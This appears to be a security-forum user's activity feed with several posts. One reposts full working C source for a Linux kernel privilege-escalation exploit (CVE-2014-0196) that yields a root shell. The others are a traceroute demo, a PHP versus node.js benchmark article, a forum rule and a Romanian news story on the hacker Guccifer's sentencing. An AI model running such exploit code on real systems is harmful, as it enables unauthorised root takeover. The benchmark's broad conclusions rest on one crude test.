Jump to content

Nytro

Administrators
 View Profile  See their activity

  • Posts

    18772

  • Joined

  • Last visited

  • Days Won

    729

 Content Type 

Everything posted by Nytro

  1. Nytro
    CVE-2014-0196: Linux kernel <= v3.15-rc4: raw mode PTY local echo race /* * CVE-2014-0196: Linux kernel <= v3.15-rc4: raw mode PTY local echo race * condition * * Slightly-less-than-POC privilege escalation exploit * For kernels >= v3.14-rc1 * * Matthew Daley <mattd@bugfuzz.com> * * Usage: * $ gcc cve-2014-0196-md.c -lutil -lpthread * $ ./a.out * [+] Resolving symbols * [+] Resolved commit_creds: 0xffffffff81056694 * [+] Resolved prepare_kernel_cred: 0xffffffff810568a7 * [+] Doing once-off allocations * [+] Attempting to overflow into a tty_struct............... * [+] Got it * # id * uid=0(root) gid=0(root) groups=0(root) * * WARNING: The overflow placement is still less-than-ideal; there is a 1/4 * chance that the overflow will go off the end of a slab. This does not * necessarily lead to an immediate kernel crash, but you should be prepared * for the worst (i.e. kernel oopsing in a bad state). In theory this would be * avoidable by reading /proc/slabinfo on systems where it is still available * to unprivileged users. * * Caveat: The vulnerability should be exploitable all the way from * v2.6.31-rc3, however relevant changes to the TTY subsystem were made in * commit acc0f67f307f52f7aec1cffdc40a786c15dd21d9 ("tty: Halve flip buffer * GFP_ATOMIC memory consumption") that make exploitation simpler, which this * exploit relies on. * * Thanks to Jon Oberheide for his help on exploitation technique. */ #include <sys/stat.h> #include <sys/types.h> #include <fcntl.h> #include <pthread.h> #include <pty.h> #include <stdio.h> #include <string.h> #include <termios.h> #include <unistd.h> #define TTY_MAGIC 0x5401 #define ONEOFF_ALLOCS 200 #define RUN_ALLOCS 30 struct device; struct tty_driver; struct tty_operations; typedef struct { int counter; } atomic_t; struct kref { atomic_t refcount; }; struct tty_struct_header { int magic; struct kref kref; struct device *dev; struct tty_driver *driver; const struct tty_operations *ops; } overwrite; typedef int __attribute__((regparm(3))) (* commit_creds_fn)(unsigned long cred); typedef unsigned long __attribute__((regparm(3))) (* prepare_kernel_cred_fn)(unsigned long cred); int master_fd, slave_fd; char buf[1024] = {0}; commit_creds_fn commit_creds; prepare_kernel_cred_fn prepare_kernel_cred; int payload(void) { commit_creds(prepare_kernel_cred(0)); return 0; } unsigned long get_symbol(char *target_name) { FILE *f; unsigned long addr; char dummy; char name[256]; int ret = 0; f = fopen("/proc/kallsyms", "r"); if (f == NULL) return 0; while (ret != EOF) { ret = fscanf(f, "%p %c %s\n", (void **)&addr, &dummy, name); if (ret == 0) { fscanf(f, "%s\n", name); continue; } if (!strcmp(name, target_name)) { printf("[+] Resolved %s: %p\n", target_name, (void *)addr); fclose(f); return addr; } } printf("[-] Couldn't resolve \"%s\"\n", name); fclose(f); return 0; } void *overwrite_thread_fn(void *p) { write(slave_fd, buf, 511); write(slave_fd, buf, 1024 - 32 - (1 + 511 + 1)); write(slave_fd, &overwrite, sizeof(overwrite)); } int main() { char scratch[1024] = {0}; void *tty_operations[64]; int i, temp_fd_1, temp_fd_2; for (i = 0; i < 64; ++i) tty_operations[i] = payload; overwrite.magic = TTY_MAGIC; overwrite.kref.refcount.counter = 0x1337; overwrite.dev = (struct device *)scratch; overwrite.driver = (struct tty_driver *)scratch; overwrite.ops = (struct tty_operations *)tty_operations; puts("[+] Resolving symbols"); commit_creds = (commit_creds_fn)get_symbol("commit_creds"); prepare_kernel_cred = (prepare_kernel_cred_fn)get_symbol("prepare_kernel_cred"); if (!commit_creds || !prepare_kernel_cred) return 1; puts("[+] Doing once-off allocations"); for (i = 0; i < ONEOFF_ALLOCS; ++i) if (openpty(&temp_fd_1, &temp_fd_2, NULL, NULL, NULL) == -1) { puts("[-] pty creation failed"); return 1; } printf("[+] Attempting to overflow into a tty_struct..."); fflush(stdout); for (i = 0; ; ++i) { struct termios t; int fds[RUN_ALLOCS], fds2[RUN_ALLOCS], j; pthread_t overwrite_thread; if (!(i & 0xfff)) { putchar('.'); fflush(stdout); } if (openpty(&master_fd, &slave_fd, NULL, NULL, NULL) == -1) { puts("\n[-] pty creation failed"); return 1; } for (j = 0; j < RUN_ALLOCS; ++j) if (openpty(&fds[j], &fds2[j], NULL, NULL, NULL) == -1) { puts("\n[-] pty creation failed"); return 1; } close(fds[RUN_ALLOCS / 2]); close(fds2[RUN_ALLOCS / 2]); write(slave_fd, buf, 1); tcgetattr(master_fd, &t); t.c_oflag &= ~OPOST; t.c_lflag |= ECHO; tcsetattr(master_fd, TCSANOW, &t); if (pthread_create(&overwrite_thread, NULL, overwrite_thread_fn, NULL)) { puts("\n[-] Overwrite thread creation failed"); return 1; } write(master_fd, "A", 1); pthread_join(overwrite_thread, NULL); for (j = 0; j < RUN_ALLOCS; ++j) { if (j == RUN_ALLOCS / 2) continue; ioctl(fds[j], 0xdeadbeef); ioctl(fds2[j], 0xdeadbeef); close(fds[j]); close(fds2[j]); } ioctl(master_fd, 0xdeadbeef); ioctl(slave_fd, 0xdeadbeef); close(master_fd); close(slave_fd); if (!setresuid(0, 0, 0)) { setresgid(0, 0, 0); puts("\n[+] Got it :)"); execl("/bin/bash", "/bin/bash", NULL); } } } Sursa: http://www.exploit-db.com/exploits/33516/
  2. Nytro
    Da, simplu si eficient.
  3. Nytro

    Remote traceroute

    Nytro replied to aelius's topic in Programare

    Mai simplu: telnet route_server traceroute ipaddress nytro@pwn:~$ telnet route-server.gblx.net Trying 67.17.81.28... Connected to loop0.route-server.phx1.gblx.net. Escape character is '^]'. C ******************************* WARNING ******************************* This equipment is the property of Level 3 Communications. Unauthorized access is strictly prohibited. Any unauthorized access or tampering with this equipment will result in civil and/or criminal prosecution. ******************************* WARNING ******************************* route-server.phx1>traceroute 8.8.8.8 Type escape sequence to abort. Tracing the route to google-public-dns-a.google.com (8.8.8.8) 1 ge4-12-1000M.ar6.PHX1.gblx.net (67.16.148.37) 0 msec 0 msec 0 msec 2 72.14.196.50 12 msec 8 msec 8 msec 3 216.239.46.40 [AS 15169] 12 msec 64.233.174.238 [AS 15169] 8 msec 216.239.46.40 [AS 15169] 8 msec 4 64.233.175.150 [AS 15169] [MPLS: Label 338423 Exp 4] 56 msec 72.14.238.2 [AS 15169] [MPLS: Label 671714 Exp 4] 36 msec 40 msec 5 72.14.239.159 [AS 15169] [MPLS: Label 452774 Exp 4] 36 msec 72.14.239.155 [AS 15169] [MPLS: Label 522286 Exp 4] 40 msec 72.14.239.160 [AS 15169] [MPLS: Label 518798 Exp 4] 36 msec 6 64.233.174.131 [AS 15169] 40 msec 216.239.48.167 [AS 15169] 36 msec 64.233.174.129 [AS 15169] 40 msec 7 * * * 8 google-public-dns-a.google.com (8.8.8.8) [AS 15169] 36 msec 40 msec 36 msec route-server.phx1>quit Connection closed by foreign host.
  4. Nytro
    PHP vs node.js: The REAL statistics 10 June, 2014 Prahlad Yeri When it comes to web programming, I’ve always coded in ASP.NET or the LAMP technologies for most part of my life. Now, the new buzz in the city is node.js. It is a light-weight platform that runs javascript code on server-side and is said to improvise performance by using async I/O. The theory suggests that synchronous or blocking model of I/O works something like this: I/O is typically the costliest part of a web transaction. When a request arrives to the apache web server, it passes it to PHP interpreter for scripting any dynamic contents. Now comes the tricky part – If the PHP script wants to read something from the disk/database or write to it, that is the slowest link in the chain. When you call PHP function file_get_contents(), the entire thread is blocked until the contents are retrieved! The server can’t do anything until your script gets the file contents. Consider what happens when multiples of simultaneous requests are issued by different users to your server? They get queued, because no thread is available to do the job since they are all blocked in I/O! Here comes the unique selling-point of node.js. Since node.js implements async I/O in almost all its functions, the server thread in the above scenario is freed as soon as the file retrieval function (fs.readFile) is called. Then, once the I/O completes, node calls a function (passed earlier by fs.readFile) along with the data parameters. In the meantime, that valuable thread can be used for serving some other request. So thats the theory about it anyway. But I’m not someone who just accepts any new fad in the town just because it is hype and everyone uses it. Nope, I want to get under the covers and verify it for myself. I wanted to see whether this theory holds in actual practice or not. So I brought upon myself the job of writing two simple scripts for benchmarking this – one in PHP (hosted on apache2) and other in javascript (hosted on node.js). The test itself was very simple. The script would: 1. Accept the request. 2. Generate a random string of 108 kilobytes. 3. Write the string to a file on the disk. 4. Read the contents back from disk. 5. Return the string back on the response stream. This is the first script, index.php: [COLOR=#000000][B]<?php[/B][/COLOR] [COLOR=#666666][I]//index.php[/I][/COLOR] [COLOR=#000088]$s[/COLOR][COLOR=#339933]=[/COLOR][COLOR=#0000ff]""[/COLOR][COLOR=#339933];[/COLOR] [COLOR=#666666][I]//generate a random string of 108KB and a random filename[/I][/COLOR] [COLOR=#000088]$fname[/COLOR] [COLOR=#339933]=[/COLOR] [COLOR=#990000]chr[/COLOR][COLOR=#009900]([/COLOR][COLOR=#990000]rand[/COLOR][COLOR=#009900]([/COLOR][COLOR=#cc66cc]0[/COLOR][COLOR=#339933],[/COLOR][COLOR=#cc66cc]57[/COLOR][COLOR=#009900])[/COLOR][COLOR=#339933]+[/COLOR][COLOR=#cc66cc]65[/COLOR][COLOR=#009900])[/COLOR][COLOR=#339933].[/COLOR][COLOR=#990000]chr[/COLOR][COLOR=#009900]([/COLOR][COLOR=#990000]rand[/COLOR][COLOR=#009900]([/COLOR][COLOR=#cc66cc]0[/COLOR][COLOR=#339933],[/COLOR][COLOR=#cc66cc]57[/COLOR][COLOR=#009900])[/COLOR][COLOR=#339933]+[/COLOR][COLOR=#cc66cc]65[/COLOR][COLOR=#009900])[/COLOR][COLOR=#339933].[/COLOR][COLOR=#990000]chr[/COLOR][COLOR=#009900]([/COLOR][COLOR=#990000]rand[/COLOR][COLOR=#009900]([/COLOR][COLOR=#cc66cc]0[/COLOR][COLOR=#339933],[/COLOR][COLOR=#cc66cc]57[/COLOR][COLOR=#009900])[/COLOR][COLOR=#339933]+[/COLOR][COLOR=#cc66cc]65[/COLOR][COLOR=#009900])[/COLOR][COLOR=#339933].[/COLOR][COLOR=#990000]chr[/COLOR][COLOR=#009900]([/COLOR][COLOR=#990000]rand[/COLOR][COLOR=#009900]([/COLOR][COLOR=#cc66cc]0[/COLOR][COLOR=#339933],[/COLOR][COLOR=#cc66cc]57[/COLOR][COLOR=#009900])[/COLOR][COLOR=#339933]+[/COLOR][COLOR=#cc66cc]65[/COLOR][COLOR=#009900])[/COLOR][COLOR=#339933].[/COLOR][COLOR=#0000ff]'.txt'[/COLOR][COLOR=#339933];[/COLOR] [COLOR=#b1b100]for[/COLOR][COLOR=#009900]([/COLOR][COLOR=#000088]$i[/COLOR][COLOR=#339933]=[/COLOR][COLOR=#cc66cc]0[/COLOR][COLOR=#339933];[/COLOR][COLOR=#000088]$i[/COLOR][COLOR=#339933]<[/COLOR][COLOR=#cc66cc]108000[/COLOR][COLOR=#339933];[/COLOR][COLOR=#000088]$i[/COLOR][COLOR=#339933]++[/COLOR][COLOR=#009900])[/COLOR] [COLOR=#009900]{[/COLOR] [COLOR=#000088]$n[/COLOR][COLOR=#339933]=[/COLOR][COLOR=#990000]rand[/COLOR][COLOR=#009900]([/COLOR][COLOR=#cc66cc]0[/COLOR][COLOR=#339933],[/COLOR][COLOR=#cc66cc]57[/COLOR][COLOR=#009900])[/COLOR][COLOR=#339933]+[/COLOR][COLOR=#cc66cc]65[/COLOR][COLOR=#339933];[/COLOR] [COLOR=#000088]$s[/COLOR] [COLOR=#339933]=[/COLOR] [COLOR=#000088]$s[/COLOR][COLOR=#339933].[/COLOR][COLOR=#990000]chr[/COLOR][COLOR=#009900]([/COLOR][COLOR=#000088]$n[/COLOR][COLOR=#009900])[/COLOR][COLOR=#339933];[/COLOR] [COLOR=#009900]}[/COLOR] [COLOR=#666666][I]//write s to a file[/I][/COLOR] [COLOR=#990000]file_put_contents[/COLOR][COLOR=#009900]([/COLOR][COLOR=#000088]$fname[/COLOR][COLOR=#339933],[/COLOR][COLOR=#000088]$s[/COLOR][COLOR=#009900])[/COLOR][COLOR=#339933];[/COLOR] [COLOR=#000088]$result[/COLOR] [COLOR=#339933]=[/COLOR] [COLOR=#990000]file_get_contents[/COLOR][COLOR=#009900]([/COLOR][COLOR=#000088]$fname[/COLOR][COLOR=#009900])[/COLOR][COLOR=#339933];[/COLOR] [COLOR=#b1b100]echo[/COLOR] [COLOR=#000088]$result[/COLOR][COLOR=#339933];[/COLOR] And here is the second script, server.js: [COLOR=#006600][I]//server.js[/I][/COLOR] [COLOR=#000066][B]var[/B][/COLOR] http [COLOR=#339933]=[/COLOR] require[COLOR=#009900]([/COLOR][COLOR=#3366CC]'http'[/COLOR][COLOR=#009900])[/COLOR][COLOR=#339933];[/COLOR] [COLOR=#000066][B]var[/B][/COLOR] server [COLOR=#339933]=[/COLOR] http.[COLOR=#660066]createServer[/COLOR][COLOR=#009900]([/COLOR]handler[COLOR=#009900])[/COLOR][COLOR=#339933];[/COLOR] [COLOR=#000066][B]function[/B][/COLOR] handler[COLOR=#009900]([/COLOR]request[COLOR=#339933],[/COLOR] response[COLOR=#009900])[/COLOR] [COLOR=#009900]{[/COLOR] [COLOR=#006600][I]//console.log('request received!');[/I][/COLOR] response.[COLOR=#660066]writeHead[/COLOR][COLOR=#009900]([/COLOR][COLOR=#CC0000]200[/COLOR][COLOR=#339933],[/COLOR] [COLOR=#009900]{[/COLOR][COLOR=#3366CC]'Content-Type'[/COLOR][COLOR=#339933]:[/COLOR] [COLOR=#3366CC]'text/plain'[/COLOR][COLOR=#009900]}[/COLOR][COLOR=#009900])[/COLOR][COLOR=#339933];[/COLOR] s[COLOR=#339933]=[/COLOR][COLOR=#3366CC]""[/COLOR][COLOR=#339933];[/COLOR] [COLOR=#006600][I]//generate a random string of 108KB and a random filename[/I][/COLOR] fname [COLOR=#339933]=[/COLOR] String.[COLOR=#660066]fromCharCode[/COLOR][COLOR=#009900]([/COLOR]Math.[COLOR=#660066]floor[/COLOR][COLOR=#009900]([/COLOR][COLOR=#CC0000]65[/COLOR] [COLOR=#339933]+[/COLOR] [COLOR=#009900]([/COLOR]Math.[COLOR=#660066]random[/COLOR][COLOR=#009900]([/COLOR][COLOR=#009900])[/COLOR][COLOR=#339933]*[/COLOR][COLOR=#009900]([/COLOR][COLOR=#CC0000]122[/COLOR][COLOR=#339933]-[/COLOR][COLOR=#CC0000]65[/COLOR][COLOR=#009900])[/COLOR][COLOR=#009900])[/COLOR] [COLOR=#009900])[/COLOR][COLOR=#009900])[/COLOR] [COLOR=#339933]+[/COLOR] String.[COLOR=#660066]fromCharCode[/COLOR][COLOR=#009900]([/COLOR]Math.[COLOR=#660066]floor[/COLOR][COLOR=#009900]([/COLOR][COLOR=#CC0000]65[/COLOR] [COLOR=#339933]+[/COLOR] [COLOR=#009900]([/COLOR]Math.[COLOR=#660066]random[/COLOR][COLOR=#009900]([/COLOR][COLOR=#009900])[/COLOR][COLOR=#339933]*[/COLOR][COLOR=#009900]([/COLOR][COLOR=#CC0000]122[/COLOR][COLOR=#339933]-[/COLOR][COLOR=#CC0000]65[/COLOR][COLOR=#009900])[/COLOR][COLOR=#009900])[/COLOR] [COLOR=#009900])[/COLOR][COLOR=#009900])[/COLOR] [COLOR=#339933]+[/COLOR] String.[COLOR=#660066]fromCharCode[/COLOR][COLOR=#009900]([/COLOR]Math.[COLOR=#660066]floor[/COLOR][COLOR=#009900]([/COLOR][COLOR=#CC0000]65[/COLOR] [COLOR=#339933]+[/COLOR] [COLOR=#009900]([/COLOR]Math.[COLOR=#660066]random[/COLOR][COLOR=#009900]([/COLOR][COLOR=#009900])[/COLOR][COLOR=#339933]*[/COLOR][COLOR=#009900]([/COLOR][COLOR=#CC0000]122[/COLOR][COLOR=#339933]-[/COLOR][COLOR=#CC0000]65[/COLOR][COLOR=#009900])[/COLOR][COLOR=#009900])[/COLOR] [COLOR=#009900])[/COLOR][COLOR=#009900])[/COLOR] [COLOR=#339933]+[/COLOR] String.[COLOR=#660066]fromCharCode[/COLOR][COLOR=#009900]([/COLOR]Math.[COLOR=#660066]floor[/COLOR][COLOR=#009900]([/COLOR][COLOR=#CC0000]65[/COLOR] [COLOR=#339933]+[/COLOR] [COLOR=#009900]([/COLOR]Math.[COLOR=#660066]random[/COLOR][COLOR=#009900]([/COLOR][COLOR=#009900])[/COLOR][COLOR=#339933]*[/COLOR][COLOR=#009900]([/COLOR][COLOR=#CC0000]122[/COLOR][COLOR=#339933]-[/COLOR][COLOR=#CC0000]65[/COLOR][COLOR=#009900])[/COLOR][COLOR=#009900])[/COLOR] [COLOR=#009900])[/COLOR][COLOR=#009900])[/COLOR] [COLOR=#339933]+[/COLOR] [COLOR=#3366CC]".txt"[/COLOR][COLOR=#339933];[/COLOR] [COLOR=#000066][B]for[/B][/COLOR][COLOR=#009900]([/COLOR]i[COLOR=#339933]=[/COLOR][COLOR=#CC0000]0[/COLOR][COLOR=#339933];[/COLOR]i[COLOR=#339933]<[/COLOR][COLOR=#CC0000]108000[/COLOR][COLOR=#339933];[/COLOR]i[COLOR=#339933]++[/COLOR][COLOR=#009900])[/COLOR] [COLOR=#009900]{[/COLOR] n[COLOR=#339933]=[/COLOR]Math.[COLOR=#660066]floor[/COLOR][COLOR=#009900]([/COLOR][COLOR=#CC0000]65[/COLOR] [COLOR=#339933]+[/COLOR] [COLOR=#009900]([/COLOR]Math.[COLOR=#660066]random[/COLOR][COLOR=#009900]([/COLOR][COLOR=#009900])[/COLOR][COLOR=#339933]*[/COLOR][COLOR=#009900]([/COLOR][COLOR=#CC0000]122[/COLOR][COLOR=#339933]-[/COLOR][COLOR=#CC0000]65[/COLOR][COLOR=#009900])[/COLOR][COLOR=#009900])[/COLOR] [COLOR=#009900])[/COLOR][COLOR=#339933];[/COLOR] s[COLOR=#339933]+=[/COLOR]String.[COLOR=#660066]fromCharCode[/COLOR][COLOR=#009900]([/COLOR]n[COLOR=#009900])[/COLOR][COLOR=#339933];[/COLOR] [COLOR=#009900]}[/COLOR] [COLOR=#006600][I]//write s to a file[/I][/COLOR] [COLOR=#000066][B]var[/B][/COLOR] fs [COLOR=#339933]=[/COLOR] require[COLOR=#009900]([/COLOR][COLOR=#3366CC]'fs'[/COLOR][COLOR=#009900])[/COLOR][COLOR=#339933];[/COLOR] fs.[COLOR=#660066]writeFile[/COLOR][COLOR=#009900]([/COLOR]fname[COLOR=#339933],[/COLOR] s[COLOR=#339933],[/COLOR] [COLOR=#000066][B]function[/B][/COLOR][COLOR=#009900]([/COLOR]err[COLOR=#339933],[/COLOR] fd[COLOR=#009900])[/COLOR] [COLOR=#009900]{[/COLOR] [COLOR=#000066][B]if[/B][/COLOR] [COLOR=#009900]([/COLOR]err[COLOR=#009900])[/COLOR] [COLOR=#000066][B]throw[/B][/COLOR] err[COLOR=#339933];[/COLOR] [COLOR=#006600][I]//console.log("The file was saved!");[/I][/COLOR] [COLOR=#006600][I]//read back from the file[/I][/COLOR] fs.[COLOR=#660066]readFile[/COLOR][COLOR=#009900]([/COLOR]fname[COLOR=#339933],[/COLOR] [COLOR=#000066][B]function[/B][/COLOR] [COLOR=#009900]([/COLOR]err[COLOR=#339933],[/COLOR] data[COLOR=#009900])[/COLOR] [COLOR=#009900]{[/COLOR] [COLOR=#000066][B]if[/B][/COLOR] [COLOR=#009900]([/COLOR]err[COLOR=#009900])[/COLOR] [COLOR=#000066][B]throw[/B][/COLOR] err[COLOR=#339933];[/COLOR] result [COLOR=#339933]=[/COLOR] data[COLOR=#339933];[/COLOR] response.[COLOR=#660066]end[/COLOR][COLOR=#009900]([/COLOR]result[COLOR=#009900])[/COLOR][COLOR=#339933];[/COLOR] [COLOR=#009900]}[/COLOR][COLOR=#009900])[/COLOR][COLOR=#339933];[/COLOR] [COLOR=#009900]}[/COLOR] [COLOR=#009900])[/COLOR][COLOR=#339933];[/COLOR] [COLOR=#009900]}[/COLOR] server.[COLOR=#660066]listen[/COLOR][COLOR=#009900]([/COLOR][COLOR=#CC0000]8124[/COLOR][COLOR=#009900])[/COLOR][COLOR=#339933];[/COLOR] console.[COLOR=#660066]log[/COLOR][COLOR=#009900]([/COLOR][COLOR=#3366CC]'Server running at [URL]http://127.0.0.1:8124/[/URL]'[/COLOR][COLOR=#009900])[/COLOR][COLOR=#339933];[/COLOR] And then, I ran the apache benchmarking tool on both of them with 2000 requests (200 concurrent). When I saw the time stats of the result, I was astounded: [TABLE] [TR] [TD=class: code]#PHP: Concurrency Level: 200 Time taken for tests: 574.796 seconds Complete requests: 2000 #node.js: Concurrency Level: 200 Time taken for tests: 41.887 seconds Complete requests: 2000[/TD] [/TR] [/TABLE] The truth is out. node.js was faster than PHP by more 14 times! These results are astonishing. It simply means that node.js IS going to be THE de-facto standard for writing performance driven apps in the upcoming future, there is no doubt about it! Agreed that the nodejs ecosystem isn’t that widely developed yet, and most node modules for things like db connectivity, network access, utilities, etc. are actively being developed. But still, after seeing these results, its a no-brainer. Any extra effort spent in developing node.js apps is more than worth it. PHP might be still having the “king of web” status, but with node.js in the town, I don’t see that status staying for very long! References https://en.wikipedia.org/wiki/Node.js The emperor’s new clothes were built with Node.js | Notes (beta) node.js Sursa: PHP vs node.js: The REAL statistics | Prahlad Yeri
  5. Nytro

    Regulament RST Market

    Nytro replied to a topic in RST Market

    Fara UP-uri. Warn pentru FIECARE up sau post inutil pe post de "up" il vad.
  6. Nytro
    Hackerul Guccifer, condamnat la ?apte ani de închisoare cu executare de Otilia Ciocan Tribunalul Bucure?ti l-a condamnat vineri pe hackerul Marcel Laz?r Lehel, cunoscut sub numele de Guccifer, la ?apte ani de închisoare cu executare, pentru c? a spart conturile de e-mail ale directorului SRI George Maior, ale europarlamentarului Corina Cre?u ?i ale unor vedete. Marcel Laz?r Lehel a fost condamnat la câte trei ani de închisoare pentru spargerea conturilor de e-mail ale directorului SRI George Maior ?i ale europarlamentarului Corina Cre?u. Instan?a a dispus contopirea pedepselor ?i aplicarea unui spor de pedeaps? de un an, astfel încât hackerul Guccifer a fost condamnat la patru ani de închisoare cu executare în acest dosar. Totodat?, instan?a a constatat c? Marcel Laz?r Lehel a mai fost condamnat, în 8 februarie 2012, de Judec?toria Sectorului 3, la trei ani de închisoare cu suspendare, pentru spargerea conturilor de e-mail ale unor vedete. Astfel, instan?a a ad?ugat pedeapsa de trei ani la condamnarea din dosarul privind spargerea conturilor de e-mail a cu executare le lui George Maior ?i Corinei Cre?u, hackerul urmând s? execute o pedeaps? de ?apte ani de închisoare, dac? decizia r?mâne definitiv?. Tribunalul Bucure?ti a precizat c? decizia din 2012 a Judec?toriei Sectorului 3 este definitiv? întrucât nu a fost contestat?. De asemenea, instan?a i-a interzis lui Lehel mai multe drepturi, pe o durat? de trei ani dup? executarea pedepsei principale. Prin decizia de vineri, Tribunalul Bucure?ti a men?inut m?sura arest?rii preventive a lui Marcel Laz?r Lehel, acesta fiind încarcerat din 22 ianuarie. Instan?a a mai dispus confiscarea de la Lehel a unui laptop. Judec?torul a luat act c? George Cristian Maior ?i Corina Cre?u nu s-au constituit p?r?i civile. Decizia nu este definitiv?, aceasta putând fi contestat? la Curtea de Apel Bucure?ti. Hackerul Marcel Laz?r Lehel a recunoscut, la ultimul termen de judecat?, c? a spart conturile de e-mail ale directorului SRI, George Maior, ale europarlamentarului Corina Cre?u ?i ale unor vedete, el fiind judecat prin procedura simplificat?. "Am recunoscut ?i recunosc toate faptele de care sunt acuzat. Solicit judecarea cauzei pe baza probelor administrate pe parcursul urm?ririi penale. Regret faptele s?vâr?ite. (...) Pe parcursul acestui proces, procurorii DIICOT spuneau c? a? fi pericol la siguran?a na?ional?. A? spune c? este vorba despre trei conturi de e-mail particulare care au fost preluate de mine f?r? s? existe un prejudiciu material sau v?t?mare corporal?. Probabil, toat? lumea a avut într-o zi contul spart. Eu, personal, am avut cinci conturi sparte ?i nu m-am dus la DIICOT. Faptele nu sunt nici pe departe atât de grave. Sunt trei conturi personale, nicidecum de serviciu ", a spus Guccifer, în fa?a instan?ei, la termenul din 26 mai. În 18 martie, hackerul Marcel Laz?r Lehel a fost trimis în judecat? pentru infrac?iuni informatice, fiind acuzat c? a spart conturile de e-mail ?i Facebook ale mai multor vedete ?i c?su?ele po?tale electronice ale directorului SRI, George Maior. Procurorii Direc?iei de Investigare a Infrac?iunilor de Criminalitate Organizat? ?i Terorism (DIICOT) - Structura Central? au dispus trimiterea în judecat? a inculpatului "L.M.L, alias «Guccifer»", în stare de arest preventiv, pentru acces f?r? drept la un sistem informatic, prin înc?lcarea m?surilor de securitate, în scopul ob?inerii de date informatice, restric?ionarea accesului la date informatice, transferul neautorizat de date dintr-un sistem informatic ?i violarea secretului coresponden?ei, se ar?ta într-un comunicat remis agen?iei MEDIAFAX. "În cauz? exist? suspiciunea rezonabil? c?, în cursul anului 2013, în baza unei rezolu?ii infrac?ionale unice, inculpatul L.M.L (Marcel Laz?r Lehel, n.r.) a accesat, în mod repetat ?i f?r? drept, prin înc?lcarea m?surilor de securitate, conturile de e-mail apar?inând unor persoane publice din România, cu scopul de a intra în posesia datelor confiden?iale aflate în po?ta electronic?, dup? care a schimbat parolele de autentificare, restric?ionând astfel accesul utilizatorilor de drept la datele informatice aflate în po?ta electronic?", preciza DIICOT. Hackerul ar fi transferat neautorizat, în sistemul s?u informatic, datele aflate în conturile de e-mail compromise, iar apoi ar fi divulgat con?inutul coresponden?ei c?tre public, "ac?iuni frauduloase s?vâr?ite în scopul lez?rii intimit??ii în mediul on-line ?i denigr?rii imaginii publice ale persoanelor în cauz?". Marcel Laz?r Lehel a fost prins în 22 ianuarie, de procurorii DIICOT, în urma unei perchezi?ii la locuin?a acestuia din jude?ul Arad. B?rbatul a fost arestat preventiv în 23 ianuarie, în urma unei decizii a Judec?toriei Sectorului 5. Anchetatorii ar?tau atunci c? hackerul ar fi spart c?su?ele de po?t? electronic? de Yahoo ?i Gmail ale ?efului SRI George Maior, dup? care i-ar fi trimis acestuia, pe adresa de email de pe serverul SRI, un mesaj ce con?inea un link c?tre date extrase din cele dou? c?su?e de email personale. Marcel Laz?r Lehel, care folosea pseudonimele "Guccifer" ?i "Micul fum", ar fi accesat conturile de e-mail ?i de Facebook ale unor persoane publice, printre care Colin Powell, membri ai familiilor Bush ?i Rockefeller ?i oficiali ai administra?iei Obama. În 8 februarie 2012, hackerul "Micul fum" a fost condamnat la trei ani de închisoare cu suspendarea execut?rii pedepsei, de c?tre Judec?toria Sectorului 3 Bucure?ti. Marcel Laz?r Lehel ar fi accesat ilegal conturile de e-mail ?i pe cele de pe platforma de socializare Facebook apar?inând unor angaja?i ai unui trust media ?i unor persoane publice, iar ulterior a f?cut publice discu?ii private ?i fotografii ale acestora. În 19 august 2011, Marcel Laz?r Leher a fost re?inut pentru comiterea a 25 de infrac?iuni de acces f?r? drept la sisteme informatice, 25 de infrac?iuni de modificare f?r? drept ?i restric?ionarea accesului la date informatice, 25 de infrac?iuni de transfer neautorizat de date dintr-un sistem informatic ?i 15 infrac?iuni de violarea secretului coresponden?ei. B?rbatul a fost acuzat c?, în perioada octombrie 2010 - iulie 2011, a accesat f?r? drept, prin înc?lcarea m?surilor de securitate, conturile de e-mail ?i conturile aferente platformei de socializare Facebook, apar?inând lui Drago? Mo?tenescu, Corina Caragea, Laura Cosoi, Roxana Iv?nescu, Rona Hartner, Iliviu Lesu, Daniela Aciu, Irina Reisler C?pitanu, Violeta Babliuc, Monica Barbu, Lenu?a Aciu, Simona R?dulescu, Denisa Barboni, Bianca Dr?gu?anu, Cristian Pulhac, Ada Milea, Organiza?ia de Tineret APDL, ar?tau atunci anchetatorii. Ca mod de operare, Laz?r Lehel ar fi restric?ionat accesul utilizatorilor de drept la sistemele informatice ?i a copiat în mod neautorizat informa?iile, fotografiile ?i coresponden?a privat? stocate în cadrul conturilor p?r?ilor v?t?mate, au stabilit procurorii DIICOT. Ulterior, el a divulgat con?inutul coresponden?ei c?tre public, prin intermediul re?elei de socializare, postând pe conturile personale create special în acest scop - "Micul fum" ?i "Thevem Theven" informa?ii ?i date confiden?iale, respectiv fotografii, mesaje electronice ?i alte discu?ii private purtate de c?tre p?r?ile v?t?mate pe conturile de socializare ?i aplica?iile de chat. Printre cei afecta?i de ac?iunile lui "Guccifer" se afl? ?i actorul american Steve Martin, John Dean, fostul consilier al pre?edintelui Richard Nixon, actri?a Mariel Hemingway, trei membri ai Camerei Lorzilor din Marea Britanie, Laura Manning Johnson, fost analist CIA, George Roche, fost secretar al For?elor Aeriene, ?i pre?edintele MetLife (companie de asigur?ri). Conform unora dintre persoanele afectate, conturile au fost sparte de pe adrese IP din Grecia ?i Rusia, scria Thesmokinggun.com. Hackerul "Guccifer" a revendicat, în februarie 2013, piratarea unor conturi de e-mail apar?inând unor membri ai familiei Bush, divulgând coresponden?? de natur? personal?. În august 2013, "Guccifer" a postat pe pagina sa de Facebook un link c?tre o coresponden?? prin e-mail între fostul secretar de stat american Colin Powell ?i europarlamentarul PSD Corina Cre?u. "Un tr?d?tor al patriei", a scris hackerul pe wall-ul lui Powell pe Facebook, ata?ând un link spre un drive Google cu e-mailuri primite de Powell de la Cre?u în perioada 2010-2011, prin contul s?u pe AOL. În aceste e-mailuri, Cre?u îl nume?te pe Powell, originar din Bronx, New York, "dragostea vie?ii mele" ?i sugereaz? c? scrie despre o poveste de dragoste mai veche, potrivit TheSmokingGun.com. Fostul secretar de stat american a fost nevoit s? ofere clarific?ri despre rela?ia sa cu Corina Cre?u, în urma acestor dezv?luiri. Potrivit mai multor publica?ii, între care The Daily Mail, Huffington Post, New York Daily News ?i postului american de televiziune Fox News, fostul general a r?spuns unor întreb?ri din partea site-ului The Smoking Gun.com, afirmând c? nu ?i-a în?elat so?ia - cu care este c?s?torit de aproximativ 50 de ani - cu Cre?u, în prezent europarlamentar PSD, dup? ce e-mailuri "de natur? foarte persoan?" au fost f?cute publice. Powell a declarat c? a cunoscut-o pe Cre?u în urm? cu aproximativ zece ani, în timp ce era secretar de stat al fostului pre?edinte George W. Bush, 